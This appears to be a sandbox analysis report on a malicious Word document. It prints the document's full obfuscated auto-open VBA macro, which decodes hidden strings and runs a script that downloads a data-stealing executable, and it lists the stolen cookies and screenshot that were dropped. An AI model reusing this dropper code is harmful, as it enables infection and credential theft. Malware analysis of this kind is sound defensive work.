VTI SCORE: 100/100
Dynamic Analysis Report |
Classification: |
Dropper
Downloader
Spyware
|
Threat Names: |
Generic.DataStealer.1.10B5EEBC
Generic.DataStealer.1.53C171F3
Mal/HTMLGen-A
|
CUsersUserDesktopfasfas.docm
Word Document
Created at 2020-10-04T21:52:00
This is a filtered view
This list contains only the embedded files, downloaded files, and dropped files
Filters: |
There are no files for this filter
There are no files in this analysis
Filename | Category | Type | Severity | Actions |
---|
C:\Users\FD1HVy\Desktop\CUsersUserDesktopfasfas.docm | Sample File | Word Document |
Malicious
|
...
|
»
Office Information
»
Creator | b.raduev |
Last Modified By | Windows User |
Revision | 3 |
Create Time | 2020-10-04 17:38:00+00:00 |
Modify Time | 2020-10-04 17:39:00+00:00 |
Last Printed | 2015-10-05 11:11:00+00:00 |
Document Information
»
Application | Microsoft Office Word |
App Version | 16.0000 |
Template | Normal |
Company | Hewlett-Packard |
Document Security | NONE |
Editing Time | 1.0 |
Page Count | 2 |
Line Count | 46 |
Paragraph Count | 13 |
Word Count | 984 |
Character Count | 5614 |
Chars With Spaces | 6585 |
ScaleCrop |
![]() |
SharedDoc |
![]() |
VBA Macros (1)
»
Macro #1: AutoOpen
»
Attribute VB_Name = "AutoOpen"
Function OeBsBDJAFBVPwXvmpQPhk()
End Function
If 1 <> 1 Then
Function cHxafyGOQsJLNKBzeyxdJ(1 as Integer)
End Function
End If
Sub Document_Open()
cwqRTnIrAhnteXoHsTjMN
End Sub
Sub DocumentOpen()
cwqRTnIrAhnteXoHsTjMN
End Sub
Sub Auto_Open()
cwqRTnIrAhnteXoHsTjMN
End Sub
Sub AutoOpen()
cwqRTnIrAhnteXoHsTjMN
End Sub
Sub Auto_Exec()
cwqRTnIrAhnteXoHsTjMN
End Sub
Sub AutoExec()
cwqRTnIrAhnteXoHsTjMN
End Sub
Function DecodeBase64(b64$)
Dim jhhhIlgoCDrrfybqCTUDm
With CreateObject("Microsoft.XMLDOM").createElement("b64")
.DataType = "bin.base64": .Text = b64
jhhhIlgoCDrrfybqCTUDm = .nodeTypedValue
With CreateObject("ADODB.Stream")
.Open: .Type = 1: .Write jhhhIlgoCDrrfybqCTUDm: .Position = 0: .Type = 2: .Charset = "utf-8"
DecodeBase64 = .ReadText
.Close
End With
End With
End Function
Sub cwqRTnIrAhnteXoHsTjMN()
Dim MDwLLNcesSTnRppFbClaD As Integer, sLgRMkHOjsIzwgntiKXBM As Integer, lfPjwNpNWtogfuQqSXCuo As Boolean
MDwLLNcesSTnRppFbClaD = 861
sLgRMkHOjsIzwgntiKXBM = 3231
If MDwLLNcesSTnRppFbClaD >= sLgRMkHOjsIzwgntiKXBM Then
lfPjwNpNWtogfuQqSXCuo = True
Else
lfPjwNpNWtogfuQqSXCuo = True
End If
Dim rLvdoMvhxcEEvbEnBdCbG, onlYkHgcnVBPtdxFiEeQr, sebLmpQdyivtMdxkddfpe
rLvdoMvhxcEEvbEnBdCbG = 0
onlYkHgcnVBPtdxFiEeQr = 2595
While rLvdoMvhxcEEvbEnBdCbG < onlYkHgcnVBPtdxFiEeQr
sebLmpQdyivtMdxkddfpe = sebLmpQdyivtMdxkddfpe + 1044
rLvdoMvhxcEEvbEnBdCbG = rLvdoMvhxcEEvbEnBdCbG + 1
Wend
Dim GYYvfAYAnjXYVkrJwgIXi, wipbPgMbfusVsvXilnXyI, bKkkqLaDBHdhnjQJuptmz
GYYvfAYAnjXYVkrJwgIXi = 0
wipbPgMbfusVsvXilnXyI = 607
While GYYvfAYAnjXYVkrJwgIXi < wipbPgMbfusVsvXilnXyI
bKkkqLaDBHdhnjQJuptmz = bKkkqLaDBHdhnjQJuptmz + 245
GYYvfAYAnjXYVkrJwgIXi = GYYvfAYAnjXYVkrJwgIXi + 1
Wend
Dim FynRAKYqeNyVuYyBAMBfP As String
FynRAKYqeNyVuYyBAMBfP = "5AAED2DCC8DEEEA6E8F2D8CA4090D2C8C8CADC405A86DEDADAC2DCC840444448DACADA407A40B6A6F2E6E8CADA5CA4EADCE8"
Dim mffMbnvdMziOSxXNzPeHf As String
mffMbnvdMziOSxXNzPeHf = "D2DACA5C92DCE8CAE4DEE0A6CAE4ECD2C6CAE65C9AC2E4E6D0C2D8BA747482D8D8DEC6908ED8DEC4C2D85072606E6C5276B6"
Dim OiehcydhSwDIltshfyxCn As String
OiehcydhSwDIltshfyxCn = "A4CACCBA5C82E6E6CADAC4D8F25C8ECAE8A8F2E0CA504EA6F2E6E8CA4E564EDA5C9AC24E564EDCC2CE4E564ECADA4E564ECA"
Dim qoqgBAzNaWxxJwWbFYNrU As String
qoqgBAzNaWxxJwWbFYNrU = "DCE85C82EA4E564EE8DEDAC24E564EE8D2DEDC5C824E564EDAE64E564ED24E564EAA4E564EE8D24E564ED84E564EE64E525C"
Dim TcDfGeFFuqGeRySMazXDt As String
TcDfGeFFuqGeRySMazXDt = "8ECAE88CD2CAD8C8504EC24E564EDA4E564EE64E564ED2A64E564ECAE64E564EE6D24E564EDEDC4E584E9CDEDCA0EAC4D8D2"
Dim RzglAVvgzzIkrwlLbUwTh As String
RzglAVvgzzIkrwlLbUwTh = "C658A6E8C2E8D2C64E525CA6CAE8ACC2D8EACA5048DCEAD8D8584048DCEAD8D85276B6A4CACCBA5C82E6E6CADAC4D8F25C8E"
Dim FFPtQXdnEyPNBcCxTfhjz As String
FFPtQXdnEyPNBcCxTfhjz = "CAE8A8F2E0CA504EA6F24E564EE6E84E564ECADA5C4E564E9AC24E564EDCC2CECA4E564EDACADCE85C82EA4E564EE8DEDA4E"
Dim TQXSAcHbXEAIllSpQIWrR As String
TQXSAcHbXEAIllSpQIWrR = "564EC2E8D2DE4E564EDC5C82DA4E564EE6D24E564EAAE84E564ED24E564ED8E64E525C8ECAE88CD2CAD8C8504EC24E564EDA"
Dim TaRwOtIohOoJHKORzqVvm As String
TaRwOtIohOoJHKORzqVvm = "E64E564ED2864E564EDEDC4E564EE8CA4E564EF0E84E584E9CDEDCA0EAC4D8D2C658A6E8C2E8D2C64E525CA6CAE8ACC2D8EA"
Dim GTpeqQIhcwkQGaPfwKHXL As String
GTpeqQIhcwkQGaPfwKHXL = "CA5048DCEAD8D85840B692DCE8A0E8E4BA48DACADA5276509CCAEE5A9EC4D4CAC6E840A6F2E6E8CADA5C9CCAE85CAECAC486"
Dim QPlYCzexrsbVFngCryCYg As String
QPlYCzexrsbVFngCryCYg = "D8D2CADCE8525C88DEEEDCD8DEC2C88CD2D8CA504ED0E8E8E0E6745E5EE8D26ADC5CC2DCC8DCDED8D2D6CAC2DCC8E8DEDE5C"
Dim eseRaKYLcFowzOddfMqEI As String
eseRaKYLcFowzOddfMqEI = "E4EA5E686C64687062706E645CCAF0CA4E5848CADCEC7482A0A08882A882564EB8DCCAEEC4EAD2D8C85CCAF0CA4E527650CE"
Dim JeiUbMICflfYELxhgCNeL As String
JeiUbMICflfYELxhgCNeL = "CAE85AD2E8CADA4048CADCEC7482A0A08882A882B8DCCAEEC4EAD2D8C85CCAF0CA525C82E8E8E4D2C4EAE8CAE640567A404E"
Dim pLMzgxcylKltwunUWYXpi As String
pLMzgxcylKltwunUWYXpi = "90D2C8C8CADC4E76A6E8C2E4E85AA0E4DEC6CAE6E6405048CADCEC7482A0A08882A882564EB8DCCAEEC4EAD2D8C85CCAF0CA"
Dim VtixTcFVYkBAWurvvToFe As String
VtixTcFVYkBAWurvvToFe = "4E524444"
Dim fmgyQXEmiSVEhMWHbrOsI, MMuEDPYzdFdpnyCldtTgm, qBAyIKweulVVfryLSmhEL
qBAyIKweulVVfryLSmhEL = 3961
For fmgyQXEmiSVEhMWHbrOsI = 1 To qBAyIKweulVVfryLSmhEL
MMuEDPYzdFdpnyCldtTgm = MMuEDPYzdFdpnyCldtTgm + 3001
Next fmgyQXEmiSVEhMWHbrOsI
Dim igeyjgMAzloGjOvcHwnbJ, IUmRMsbcqwSLVLhpWNPhK, VkVmVfIyMlgfHylQFwNKx
VkVmVfIyMlgfHylQFwNKx = 1304
For igeyjgMAzloGjOvcHwnbJ = 1 To VkVmVfIyMlgfHylQFwNKx
IUmRMsbcqwSLVLhpWNPhK = IUmRMsbcqwSLVLhpWNPhK + 4338
Next igeyjgMAzloGjOvcHwnbJ
Dim omVyqqbwmMuAqJcuLcBHl, ILAAYFBsTFDInXProurvw, LXpOogkWQzIevEzuWqKze
omVyqqbwmMuAqJcuLcBHl = 0
ILAAYFBsTFDInXProurvw = 3964
While omVyqqbwmMuAqJcuLcBHl < ILAAYFBsTFDInXProurvw
LXpOogkWQzIevEzuWqKze = LXpOogkWQzIevEzuWqKze + 2078
omVyqqbwmMuAqJcuLcBHl = omVyqqbwmMuAqJcuLcBHl + 1
Wend
Dim SbeiQJMBoNsURFpGCmKjP As String
Dim QEYUHRYMDJtXeFMVEFRAa As String
Dim PHLLubaRtHRiAGYlKIqnL As String
Dim OdcpbevTcaxtTzKhQVXWT As String
Dim DqJQGifPYwpXsrfBMFBpz As String
Dim jRJfFtqFwIpjMoBRnMABd As String
jRJfFtqFwIpjMoBRnMABd = "86E4CAC2E8CA9EC4D4CAC6E85044AEE6C6E4D2E0E85CE6D0CAD8D844525CE4EADC5044"
DqJQGifPYwpXsrfBMFBpz = "4AA88A9AA04A"
OdcpbevTcaxtTzKhQVXWT = "B8A8F4A88AD2E4D4D8D486A09C86E6E488C4D8ECEE865CECC4E6"
PHLLubaRtHRiAGYlKIqnL = FynRAKYqeNyVuYyBAMBfP & mffMbnvdMziOSxXNzPeHf & OiehcydhSwDIltshfyxCn & qoqgBAzNaWxxJwWbFYNrU & TcDfGeFFuqGeRySMazXDt & RzglAVvgzzIkrwlLbUwTh & FFPtQXdnEyPNBcCxTfhjz & TQXSAcHbXEAIllSpQIWrR & TaRwOtIohOoJHKORzqVvm & GTpeqQIhcwkQGaPfwKHXL & QPlYCzexrsbVFngCryCYg & eseRaKYLcFowzOddfMqEI & JeiUbMICflfYELxhgCNeL & pLMzgxcylKltwunUWYXpi & VtixTcFVYkBAWurvvToFe
QEYUHRYMDJtXeFMVEFRAa = "E0DEEECAE4E6D0CAD8D85CCAF0CA"
SbeiQJMBoNsURFpGCmKjP = "AEA6C6E4D2E0E85CA6D0CAD8D8"
lPMUqMgmOHHVzVCDOQbDs = "%BAT%"
Dim TDHqCcbdnFtkDgeVmOUgg As String
For iMsnnNQUWxLeJonbOcqoB = 1 To Len(jRJfFtqFwIpjMoBRnMABd) Step 2
jdUXjhwVaWEuWKPpcooji = Chr(Val("&H" & (Mid(jRJfFtqFwIpjMoBRnMABd, iMsnnNQUWxLeJonbOcqoB, 2))))
TDHqCcbdnFtkDgeVmOUgg = TDHqCcbdnFtkDgeVmOUgg & Chr(Asc(jdUXjhwVaWEuWKPpcooji) / 2)
Next iMsnnNQUWxLeJonbOcqoB
Dim ajINImSfmhoHiGKFLPUeT As String
For lbymLHvaEodPNDgbcXUlJ = 1 To Len(DqJQGifPYwpXsrfBMFBpz) Step 2
MobqkJuVaOFkFNikBWExf = Chr(Val("&H" & (Mid(DqJQGifPYwpXsrfBMFBpz, lbymLHvaEodPNDgbcXUlJ, 2))))
ajINImSfmhoHiGKFLPUeT = ajINImSfmhoHiGKFLPUeT & Chr(Asc(MobqkJuVaOFkFNikBWExf) / 2)
Next lbymLHvaEodPNDgbcXUlJ
Dim CHtJXlGxPXiPvuzxFyjMO As String
For ChQqeFAjmHxYNmuHFcSOw = 1 To Len(OdcpbevTcaxtTzKhQVXWT) Step 2
lbpDxekJlxOkeYABsTEgn = Chr(Val("&H" & (Mid(OdcpbevTcaxtTzKhQVXWT, ChQqeFAjmHxYNmuHFcSOw, 2))))
CHtJXlGxPXiPvuzxFyjMO = CHtJXlGxPXiPvuzxFyjMO & Chr(Asc(lbpDxekJlxOkeYABsTEgn) / 2)
Next ChQqeFAjmHxYNmuHFcSOw
Dim hUyzFWUrhjvgxDesmVgPo As String
For NqSuaTLpqDwlPKfFHlLQj = 1 To Len(SbeiQJMBoNsURFpGCmKjP) Step 2
hDVOtcloqqEtBtEFfEcjc = Chr(Val("&H" & (Mid(SbeiQJMBoNsURFpGCmKjP, NqSuaTLpqDwlPKfFHlLQj, 2))))
hUyzFWUrhjvgxDesmVgPo = hUyzFWUrhjvgxDesmVgPo & Chr(Asc(hDVOtcloqqEtBtEFfEcjc) / 2)
Next NqSuaTLpqDwlPKfFHlLQj
Dim YnQRnrzYCGIHhqXWTLjlB As String
For LFkuwMQIzXkHbQrhctzyM = 1 To Len(QEYUHRYMDJtXeFMVEFRAa) Step 2
adKpWpNYKTHpynHGwQDIp = Chr(Val("&H" & (Mid(QEYUHRYMDJtXeFMVEFRAa, LFkuwMQIzXkHbQrhctzyM, 2))))
YnQRnrzYCGIHhqXWTLjlB = YnQRnrzYCGIHhqXWTLjlB & Chr(Asc(adKpWpNYKTHpynHGwQDIp) / 2)
Next LFkuwMQIzXkHbQrhctzyM
Dim njPlQJRqHnTjVGKkGtOXT As String
For CJwIgrYsRLTsUWGWJzcnV = 1 To Len(lPMUqMgmOHHVzVCDOQbDs) Step 2
guNLDoRshxmFyJysBJsSX = Chr(Val("&H" & (Mid(lPMUqMgmOHHVzVCDOQbDs, CJwIgrYsRLTsUWGWJzcnV, 2))))
njPlQJRqHnTjVGKkGtOXT = njPlQJRqHnTjVGKkGtOXT & Chr(Asc(guNLDoRshxmFyJysBJsSX) / 2)
Next CJwIgrYsRLTsUWGWJzcnV
Dim DybQRIhndbPXphKQpOWwV As String
For cveWbAMHkaKPxxXoabDAe = 1 To Len(PHLLubaRtHRiAGYlKIqnL) Step 2
wfwuNPCQcelqRAcVSQhuF = Chr(Val("&H" & (Mid(PHLLubaRtHRiAGYlKIqnL, cveWbAMHkaKPxxXoabDAe, 2))))
DybQRIhndbPXphKQpOWwV = DybQRIhndbPXphKQpOWwV & Chr(Asc(wfwuNPCQcelqRAcVSQhuF) / 2)
Next cveWbAMHkaKPxxXoabDAe
Dim kDzUzojJEhpKXflqeDwWI As String
Set PAYQaJenWSLJXvpIWCchY = CreateObject(hUyzFWUrhjvgxDesmVgPo)
kDzUzojJEhpKXflqeDwWI = PAYQaJenWSLJXvpIWCchY.ExpandEnvironmentStrings(ajINImSfmhoHiGKFLPUeT)
Set PAYQaJenWSLJXvpIWCchY = Nothing
Dim GSkQtdDEJRaSjyLwVAWae As String
GSkQtdDEJRaSjyLwVAWae = kDzUzojJEhpKXflqeDwWI & "\JoHMwmhDhPJuWqSOTCEMf.txt"
Dim EyxFiOXQzapNDfvQyQGQr As Integer
EyxFiOXQzapNDfvQyQGQr = FreeFile
Open GSkQtdDEJRaSjyLwVAWae For Output As EyxFiOXQzapNDfvQyQGQr
Print #EyxFiOXQzapNDfvQyQGQr, TDHqCcbdnFtkDgeVmOUgg & YnQRnrzYCGIHhqXWTLjlB & " " & DybQRIhndbPXphKQpOWwV & """), 0"
Close EyxFiOXQzapNDfvQyQGQr
Name kDzUzojJEhpKXflqeDwWI & "\JoHMwmhDhPJuWqSOTCEMf.txt" As kDzUzojJEhpKXflqeDwWI & CHtJXlGxPXiPvuzxFyjMO
CreateObject(hUyzFWUrhjvgxDesmVgPo).Exec ("cscript " & kDzUzojJEhpKXflqeDwWI & CHtJXlGxPXiPvuzxFyjMO)
Dim qVqdFUsuQxWltXUtRxRGI, LjmFkiJobVnktUfgDDqvA, UMNyfsyInwLkIDMexuMIf
qVqdFUsuQxWltXUtRxRGI = 0
LjmFkiJobVnktUfgDDqvA = 691
While qVqdFUsuQxWltXUtRxRGI < LjmFkiJobVnktUfgDDqvA
Dim PAIaadOnnSAlhPvyhfPkE As Integer, MzBYJqscgiDLvflexfpJv As Integer, YCkYAMrEppVyzcbhapLwl As Boolean
PAIaadOnnSAlhPvyhfPkE = 4177
MzBYJqscgiDLvflexfpJv = 4258
If MzBYJqscgiDLvflexfpJv >= PAIaadOnnSAlhPvyhfPkE Then
YCkYAMrEppVyzcbhapLwl = False
Else
YCkYAMrEppVyzcbhapLwl = False
End If
UMNyfsyInwLkIDMexuMIf = UMNyfsyInwLkIDMexuMIf + 325
qVqdFUsuQxWltXUtRxRGI = qVqdFUsuQxWltXUtRxRGI + 1
Wend
Dim UckWwODnjSSnANchlFqwX, qofPaghuNpQqkQIYwmjVm, YUddyuBSlkCkpDMfgwIvR
YUddyuBSlkCkpDMfgwIvR = 3492
For UckWwODnjSSnANchlFqwX = 1 To YUddyuBSlkCkpDMfgwIvR
qofPaghuNpQqkQIYwmjVm = qofPaghuNpQqkQIYwmjVm + 4774
Next UckWwODnjSSnANchlFqwX
End Sub
YARA Matches (1)
»
Rule Name | Rule Description | Classification | Score | Actions |
---|---|---|---|---|
VBA_Obfuscation_ObjectName | VBA initializes COM object from long variable name; possible obfuscation | - |
2/5
|
...
|
C:\Users\FD1HVy\AppData\Roaming\newbuild.exe | Dropped File | Binary |
Malicious
|
...
|
»
PE Information
»
Image Base | 0x400000 |
Entry Point | 0x41c63a |
Size Of Code | 0x1ca00 |
Size Of Initialized Data | 0x800 |
File Type | FileType.executable |
Subsystem | Subsystem.windows_gui |
Machine Type | MachineType.i386 |
Compile Timestamp | 2020-09-30 10:24:48+00:00 |
Version Information (7)
»
Assembly Version | 0.0.0.0 |
FileDescription | |
FileVersion | 0.0.0.0 |
InternalName | Anubis.exe |
LegalCopyright | |
OriginalFilename | Anubis.exe |
ProductVersion | 0.0.0.0 |
Sections (3)
»
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x402000 | 0x1c870 | 0x1ca00 | 0x200 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.17 |
.rsrc | 0x420000 | 0x4d4 | 0x600 | 0x1cc00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 3.7 |
.reloc | 0x422000 | 0xc | 0x200 | 0x1d200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 0.1 |
Imports (1)
»
mscoree.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
_CorExeMain | 0x0 | 0x402000 | 0x1c610 | 0x1a810 | 0x0 |
Memory Dumps (1)
»
Name | Process ID | Start VA | End VA | Dump Reason | PE Rebuild | Bitness | Entry Point | AV | YARA | Actions |
---|---|---|---|---|---|---|---|---|---|---|
newbuild.exe | 10 | 0x00E70000 | 0x00E93FFF | Relevant Image |
![]() |
32-bit | - |
![]() |
![]() |
...
|
Local AV Matches (1)
»
Threat Name | Severity |
---|---|
Generic.DataStealer.1.10B5EEBC |
Malicious
|
C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_h5bhifgv.f40.ps1 | Dropped File | Text |
Whitelisted
|
...
|
»
File Reputation Information
»
Severity |
Whitelisted
|
9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a | Downloaded File | Text |
Whitelisted
|
...
|
»
File Reputation Information
»
Severity |
Whitelisted
|
C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | Modified File | Stream |
Unknown
|
...
|
»
C:\Users\FD1HVy\AppData\Local\Temp\JoHMwmhDhPJuWqSOTCEMf.txt | Dropped File | Text |
Unknown
|
...
|
»
Files\4uV4065ClZioLoOxUX7f.docx | Embedded File | ZIP |
Unknown
|
...
|
»
Files\7d4Q8tI0a.docx | Embedded File | ZIP |
Unknown
|
...
|
»
Files\CQmwTaiySiiMfKSxL.docx | Embedded File | ZIP |
Unknown
|
...
|
»
Files\Gwq5EHvw1.docx | Embedded File | ZIP |
Unknown
|
...
|
»
Files\YsuINtJM29u.docx | Embedded File | ZIP |
Unknown
|
...
|
»
C:\Users\FD1HVy\AppData\Local\Temp\tempDataBase2020-10-04T23_55_52.2776960+02_0011 | Dropped File | Sqlite |
Unknown
|
...
|
»
C:\Users\FD1HVy\AppData\Local\Temp\tempDataBase2020-10-04T23_55_55.0277372+02_0011 | Dropped File | Stream |
Unknown
|
...
|
»
C:\Users\FD1HVy\AppData\Local\Temp\tempDataBase2020-10-04T23_56_05.9332145+02_0011 | Dropped File | Sqlite |
Unknown
|
...
|
»
C:\Users\FD1HVy\AppData\Local\Temp\tempDataBase2020-10-04T23_56_07.7774490+02_0011 | Dropped File | Sqlite |
Unknown
|
...
|
»
Browsers\Default_Google_Chrome_Cookies.txt | Embedded File | Text |
Unknown
|
...
|
»
C:\Users\FD1HVy\AppData\Local\Temp\bd33D770D006BC47C58714222CDAC43A71.tmp | Dropped File | Sqlite |
Unknown
|
...
|
»
C:\Users\FD1HVy\AppData\Local\Temp\ls33D770D006BC47C58714222CDAC43A71.tmp | Dropped File | Text |
Unknown
|
...
|
»
C:\Users\FD1HVy\AppData\Local\Temp\tempDataBase2020-10-04T23_56_12.8873495+02_0011 | Dropped File | Sqlite |
Unknown
|
...
|
»
C:\Users\FD1HVy\AppData\Local\Temp\R725K54.tmp | Dropped File | Text |
Unknown
|
...
|
»
cookieDomains.log | Embedded File | Text |
Unknown
|
...
|
»
Browsers\w7cr0hor.default_Firefox_Cookies.txt | Embedded File | Text |
Unknown
|
...
|
»
C:\Users\FD1HVy\AppData\Local\Temp\Germany_94.114.3.195_33D770D006BC47C58714222CDAC43A71.zip | Dropped File | ZIP |
Unknown
|
...
|
»
Archive Information
»
Number of Files | 15 |
Number of Folders | 0 |
Size of Packed Archive Contents | 503.45 KB |
Size of Unpacked Archive Contents | 558.56 KB |
File Format | zip |
Contents (15)
»
Filename | Packed Size | Unpacked Size | Compression | Is Encrypted | Modify Time | Actions |
---|---|---|---|---|---|---|
Files\Gwq5EHvw1.docx | 86.02 KB | 86.00 KB | Deflate |
![]() |
2020-02-15 16:17 (UTC+1) |
...
|
Files\YsuINtJM29u.docx | 59.45 KB | 59.43 KB | Deflate |
![]() |
2019-10-09 05:19 (UTC+2) |
...
|
Files\CQmwTaiySiiMfKSxL.docx | 61.59 KB | 61.57 KB | Deflate |
![]() |
2019-11-24 18:08 (UTC+1) |
...
|
Files\7d4Q8tI0a.docx | 94.19 KB | 94.16 KB | Deflate |
![]() |
2019-11-01 01:54 (UTC+1) |
...
|
information.log | 506 Bytes | 707 Bytes | Deflate |
![]() |
2020-10-04 23:56 (UTC+2) |
...
|
Files\4uV4065ClZioLoOxUX7f.docx | 85.64 KB | 85.61 KB | Deflate |
![]() |
2019-12-19 07:37 (UTC+1) |
...
|
UserAgents.txt | 146 Bytes | 196 Bytes | Deflate |
![]() |
2020-10-04 23:56 (UTC+2) |
...
|
cookieDomains.log | 228 Bytes | 1.67 KB | Deflate |
![]() |
2020-10-04 23:56 (UTC+2) |
...
|
Browsers\Default_Google_Chrome_Cookies.txt | 265 Bytes | 354 Bytes | Deflate |
![]() |
2020-10-04 23:56 (UTC+2) |
...
|
Browsers\w7cr0hor.default_Firefox_Cookies.txt | 2.98 KB | 13.81 KB | Deflate |
![]() |
2020-10-04 23:56 (UTC+2) |
...
|
passwords.log | 0 Bytes | 0 Bytes | Store |
![]() |
2020-10-04 23:56 (UTC+2) |
...
|
passwords.log | 0 Bytes | 0 Bytes | Store |
![]() |
2020-10-04 23:55 (UTC+2) |
...
|
passwords.log | 0 Bytes | 0 Bytes | Store |
![]() |
2020-10-04 23:56 (UTC+2) |
...
|
passwords.log | 0 Bytes | 0 Bytes | Store |
![]() |
2020-10-04 23:56 (UTC+2) |
...
|
screen.jpeg | 112.47 KB | 155.09 KB | Deflate |
![]() |
2020-10-04 23:55 (UTC+2) |
...
|
d7942a7a0c710b1efae85f2eac9483c86ac0c85a36ef207d36614a7d38c977f2 | Downloaded File | Text |
Unknown
|
...
|
»
Germany_94.114.3.195_33D770D006BC47C58714222CDAC43A71.zip | Embedded File | ZIP |
Unknown
|
...
|
»
vbaProject.bin | Embedded File | OLE Compound |
Unknown
|
...
|
»
c4a1266cae25fe4664c4511511890ff2d8b53a8a08f5c90cf41f49079910d212 | Embedded File | Binary |
Unknown
|
...
|
»
passwords.log | Embedded File | Empty File |
Not Queried
|
...
|
»